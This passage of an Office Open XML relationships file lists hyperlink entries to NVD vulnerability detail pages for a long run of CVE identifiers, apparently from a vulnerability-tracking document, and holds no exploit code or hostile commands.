Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72834" TargetMode="External" Id="rId2049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73244" TargetMode="External" Id="rId2050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73422" TargetMode="External" Id="rId2051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73508" TargetMode="External" Id="rId2052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73531" TargetMode="External" Id="rId2053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73555" TargetMode="External" Id="rId2054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73565" TargetMode="External" Id="rId2055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73628" TargetMode="External" Id="rId2056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73840" TargetMode="External" Id="rId2057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77310" TargetMode="External" Id="rId2058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId2059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78631" TargetMode="External" Id="rId2060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80339" TargetMode="External" Id="rId2061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80340" TargetMode="External" Id="rId2062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId2063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82867" TargetMode="External" Id="rId2064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82868" TargetMode="External" Id="rId2065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84191" TargetMode="External" Id="rId2066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId2067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId2068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85158" TargetMode="External" Id="rId2069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85159" TargetMode="External" Id="rId2070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85230" TargetMode="External" Id="rId2071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85577" TargetMode="External" Id="rId2072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87859" TargetMode="External" Id="rId2073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88011" TargetMode="External" Id="rId2074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88046" TargetMode="External" Id="rId2075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88057" TargetMode="External" Id="rId2076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88879" TargetMode="External" Id="rId2077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88892" TargetMode="External" Id="rId2078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89239" TargetMode="External" Id="rId2079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89240" TargetMode="External" Id="rId2080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9338" TargetMode="External" Id="rId2081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9667" TargetMode="External" Id="rId2082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-7062" TargetMode="External" Id="rId2083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0297" TargetMode="External" Id="rId2084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0298" TargetMode="External" Id="rId2085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71404" TargetMode="External" Id="rId2086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40507" TargetMode="External" Id="rId2087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40508" TargetMode="External" Id="rId2088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48550" TargetMode="External" Id="rId2089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48552" TargetMode="External" Id="rId2090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56126" TargetMode="External" Id="rId2091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56127" TargetMode="External" Id="rId2092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56128" TargetMode="External" Id="rId2093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63105" TargetMode="External" Id="rId2094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63336" TargetMode="External" Id="rId2095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67196" TargetMode="External" Id="rId2096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67333" TargetMode="External" Id="rId2097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67338" TargetMode="External" Id="rId2098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71498" TargetMode="External" Id="rId2099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71503" TargetMode="External" Id="rId2100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72747" TargetMode="External" Id="rId2101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73037" TargetMode="External" Id="rId2102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73319" TargetMode="External" Id="rId2103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73409" TargetMode="External" Id="rId2104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75107" TargetMode="External" Id="rId2105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75831" TargetMode="External" Id="rId2106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75834" TargetMode="External" Id="rId2107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81887" TargetMode="External" Id="rId2108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82024" TargetMode="External" Id="rId2109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId2110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82881" TargetMode="External" Id="rId2111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84305" TargetMode="External" Id="rId2112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84386" TargetMode="External" Id="rId2113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84967" TargetMode="External" Id="rId2114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85593" TargetMode="External" Id="rId2115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85599" TargetMode="External" Id="rId2116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85601" TargetMode="External" Id="rId2117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85781" TargetMode="External" Id="rId2118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86440" TargetMode="External" Id="rId2119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86516" TargetMode="External" Id="rId2120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86742" TargetMode="External" Id="rId2121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86745" TargetMode="External" Id="rId2122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87912" TargetMode="External" Id="rId2123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87913" TargetMode="External" Id="rId2124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4361" TargetMode="External" Id="rId2125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55425" TargetMode="External" Id="rId2126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62293" TargetMode="External" Id="rId2127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70588" TargetMode="External" Id="rId2128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72976" TargetMode="External" Id="rId2129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78635" TargetMode="External" Id="rId2130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79723" TargetMode="External" Id="rId2131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16693" TargetMode="External" Id="rId2132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19729" TargetMode="External" Id="rId2133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22575" TargetMode="External" Id="rId2134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78624" TargetMode="External" Id="rId2135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0304" TargetMode="External" Id="rId2136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40175" TargetMode="External" Id="rId2137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45572" TargetMode="External" Id="rId2138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53529" TargetMode="External" Id="rId2139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67612" TargetMode="External" Id="rId2140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67617" TargetMode="External" Id="rId2141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69474" TargetMode="External" Id="rId2142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69615" TargetMode="External" Id="rId2143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70589" TargetMode="External" Id="rId2144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70590" TargetMode="External" Id="rId2145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71325" TargetMode="External" Id="rId2146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71850" TargetMode="External" Id="rId2147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71852" TargetMode="External" Id="rId2148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71870" TargetMode="External" Id="rId2149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75904" TargetMode="External" Id="rId2150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78560" TargetMode="External" Id="rId2151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84310" TargetMode="External" Id="rId2152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84311" TargetMode="External" Id="rId2153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85541" TargetMode="External" Id="rId2154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88038" TargetMode="External" Id="rId2155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18567" TargetMode="External" Id="rId2156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62845" TargetMode="External" Id="rId2157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64373" TargetMode="External" Id="rId2158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId2159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68891" TargetMode="External" Id="rId2160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69316" TargetMode="External" Id="rId2161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69425" TargetMode="External" Id="rId2162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69483" TargetMode="External" Id="rId2163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69771" TargetMode="External" Id="rId2164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69792" TargetMode="External" Id="rId2165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId2166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId2167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71497" TargetMode="External" Id="rId2168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72931" TargetMode="External" Id="rId2169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87602" TargetMode="External" Id="rId2170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18741" TargetMode="External" Id="rId2171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44401" TargetMode="External" Id="rId2172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49836" TargetMode="External" Id="rId2173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61607" TargetMode="External" Id="rId2174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69381" TargetMode="External" Id="rId2175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId2176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76959" TargetMode="External" Id="rId2177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId2178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78508" TargetMode="External" Id="rId2179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9852" TargetMode="External" Id="rId2180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0296" TargetMode="External" Id="rId2181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18073" TargetMode="External" Id="rId2182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69713" TargetMode="External" Id="rId2183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72980" TargetMode="External" Id="rId2184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0305" TargetMode="External" Id="rId2185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16941" TargetMode="External" Id="rId2186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52730" TargetMode="External" Id="rId2187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53487" TargetMode="External" Id="rId2188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53541" TargetMode="External" Id="rId2189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54492" TargetMode="External" Id="rId2190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55547" TargetMode="External" Id="rId2191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55566" TargetMode="External" Id="rId2192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55696" TargetMode="External" Id="rId2193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55834" TargetMode="External" Id="rId2194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61911" TargetMode="External" Id="rId2195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62986" TargetMode="External" Id="rId2196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66761" TargetMode="External" Id="rId2197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66775" TargetMode="External" Id="rId2198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70427" TargetMode="External" Id="rId2199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70428" TargetMode="External" Id="rId2200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70596" TargetMode="External" Id="rId2201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71322" TargetMode="External" Id="rId2202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId2203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76962" TargetMode="External" Id="rId2204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76963" TargetMode="External" Id="rId2205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76977" TargetMode="External" Id="rId2206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78516" TargetMode="External" Id="rId2207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78593" TargetMode="External" Id="rId2208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86087" TargetMode="External" Id="rId2209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9736" TargetMode="External" Id="rId2210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0295" TargetMode="External" Id="rId2211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63466" TargetMode="External" Id="rId2212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70591" 